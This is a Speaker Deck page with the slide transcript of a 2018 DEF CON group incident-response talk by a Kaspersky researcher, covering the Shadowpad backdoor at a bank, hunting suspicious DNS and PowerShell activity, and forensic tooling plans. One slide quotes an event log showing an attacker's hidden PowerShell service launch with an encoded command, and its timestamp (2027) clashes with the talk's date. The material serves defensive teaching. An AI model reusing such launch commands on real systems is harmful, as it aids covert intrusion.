Sergey Golovanov - Indecent Response 2018

0c988f4618b436b14ce6ddcecd52d11d?s=47 DC7499
February 10, 2018
Education
0
280

Sergey Golovanov - Indecent Response 2018

0c988f4618b436b14ce6ddcecd52d11d?s=128

DC7499

February 10, 2018
Tweet

More Decks by DC7499

See All by DC7499
0c988f4618b436b14ce6ddcecd52d11d?s=48 defcon
0
150
0c988f4618b436b14ce6ddcecd52d11d?s=48 defcon
0
110
0c988f4618b436b14ce6ddcecd52d11d?s=48 defcon
0
200
0c988f4618b436b14ce6ddcecd52d11d?s=48 defcon
1
170
0c988f4618b436b14ce6ddcecd52d11d?s=48 defcon
1
150
0c988f4618b436b14ce6ddcecd52d11d?s=48 defcon
0
160
0c988f4618b436b14ce6ddcecd52d11d?s=48 defcon
0
230
0c988f4618b436b14ce6ddcecd52d11d?s=48 defcon
0
260
0c988f4618b436b14ce6ddcecd52d11d?s=48 defcon
1
330

Other Decks in Education

See All in Education
B9ade6772136154da028ffd0a006eb8f?s=48 antoinephi
1
190
577adb71f07335ac80e8122efb8351cb?s=48 ebgoetz
0
220
58660723de21de826f67924c8498336c?s=48 yasslab
2
250k
5928ad0e15b8bf8fc3a0f5ec685d9634?s=48 martine
0
810
2d05d1a8300a4286d73ba8d80776c56f?s=48 angel2020
0
480
1135dc242dcff3b90ae46fc586ff4da8?s=48 signer
0
190
18cdb6f294c8cb10a46167e462c2a51f?s=48 matleenalaakso
0
1.6k
830b019cfcaad9e565fa50b32ed5a524?s=48 kbalog
0
130
8b8d433ca23ddb6d5c1949e121b57383?s=48 karte
0
450
1135dc242dcff3b90ae46fc586ff4da8?s=48 signer
0
210
9e9eb825c69d719f2d3c32bdd3bc971e?s=48 atp
0
120
1e708b2afb8622d5c5f070a94a3425a9?s=48 tibbelit
0
190

Featured

See All Featured
0bce06bd06ee7a2c4f5500f25dcf7f18?s=48 paulrobertlloyd
71
3.5k
3ab1249be442027903e1180025340b3f?s=48 reverentgeek
168
6.9k
A60068bce2e73de3a37ca9d2dbe36092?s=48 bryan
100
11k
3d4519fd34b76fb265fc0237f3792bd4?s=48 danielanewman
199
19k
61857dafbd287b3027c4dcea9008ad3c?s=48 carmenhchung
22
1.1k
D83926c323d4f9289f947b4b4e76b939?s=48 jensimmons
205
10k
E76911cbe088e5b850d966de3fc7435b?s=48 robhawkes
52
2.7k
766b9746b59e6f09e280cd33cf4ed419?s=48 skipperchong
6
600
Be9caeb9d4ef9944d151af909063ed6e?s=48 samlambert
236
9.8k
6804f1775cb4babfcc3851298566fbce?s=48 tanoku
85
8.4k
32de0bd2ba869609d26fd052a4622778?s=48 cromwellryan
101
5.8k
C35e01544a0dd94a2cf1619ee8a42ebb?s=48 clairelew
14
1.4k

Transcript

  1. Indecent response 2018 Sergey @k1k_ Golovanov Principal Security Researcher Kaspersky

    Lab

  2. Challenge: find a SDC bus speed

  3. None

  4. Agenda 1.Shadowpad 2.0x403AA91EE 4.Plans 3.Scanner2

  5. 1.Shadowpad

  6. Case overview: 1.Antifraud system in a bank is detecting printing

    of a lot of elite cards for the last several hours 2.Bank is starting network audit 3.Bank is discovering suspicion DNS requests 4.Forensics can not find malware on PCs 5.Bank asks for help…

  7. DNS requests

  8. None
  9. None

  10. “Our worldwide customers range from small businesses right up to

    global Fortune 500 companies.” NetSarang AmericanExpress BankofAmericaCorp. BankofChina BNPParibas Citigroup DeutscheBank Fortis GeneralElectric INGGroup MerrillLynch MorganStanley ShinhanFinancialGroup SocieteGenerale UBS https://webcache.googleusercontent.com/search?q=cache:m7Nc1_mRksgJ:https://www.netsara ng.com/about/client.html+&cd=1&hl=ru&ct=clnk&gl=ru

  11. https://securelist.com/shadowpad -in-corporate-networks/81432/

  12. What was done?

  13. AutoMA – static analysis framework

  14. Shadowpad after autoMA

  15. Miniduke after autoMA

  16. 2.0x403AA91EE

  17. Case overview:

  18. None
  19. None

  20. How to find suspicion DNS requests? sort | uniq -c

    | sort -rn

  21. How to find suspicion powershell? sort | uniq -c |

    sort -rn

  22. parse_evtx.exe System.evtx | findstr /i "power" | more Record #2396788

    2027.02.22-08:03:00 'Computer':PC1', 'Channel':'System', 'EventSourceName':'Service Control Manager', 'Guid':‘GUID'Name':'Service Control Manager', 'xmlns':'http://schemas.microsoft.com/win/2004/08/events/event', 'Level':04, 'Opcode':00, 'Task':0000, 'EventID':7045 (A service was installed in the system.), 'Qualifiers':16384, 'Keywords':8080000000000000, 'SystemTime':2027.02.22-08:03:00, 'ProcessID':00000648, 'ThreadID':00010692, 'EventRecordID':0000000002396788, 'Version':00, 'UserID':SID, 'ServiceName':‘1aec4f0', 'ImagePath':'%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5A FMAdAByAGUAYQBtACgA

  23. https://github.com/KasperskyLab/ForensicsTools/

  24. 3.Scanner2

  25. Case overview: 1. No money 2. No logs 3. No

    team 4. No idea about network 5. CISO!

  26. What to do? we need logs we need mfts we

    need regs

  27. WE NEED TO RECOMPILE EVERYTHING!

  28. Awesome batch file

  29. How to find something suspicion ? sort | uniq -c

    | sort -rn

  30. https://cdn.securelist.com/files/ 2017/12/HappyNewYear.zip

  31. 4. PLANS

  32. 1. MFT is a hell. Sleuthkit is not enough. We

    need more data about deleted files. 2. USN J is required with no HDD touch. 3. Reg analysis is needed with unallocated part.

  33. Agenda 1.Shadowpad 2.0x403AA91EE 4.Plans 3.Scanner2

  34. Зачем?

  35. None

  36. Thank you! Sergey @k1k_ Golovanov Principal Security Researcher Kaspersky Lab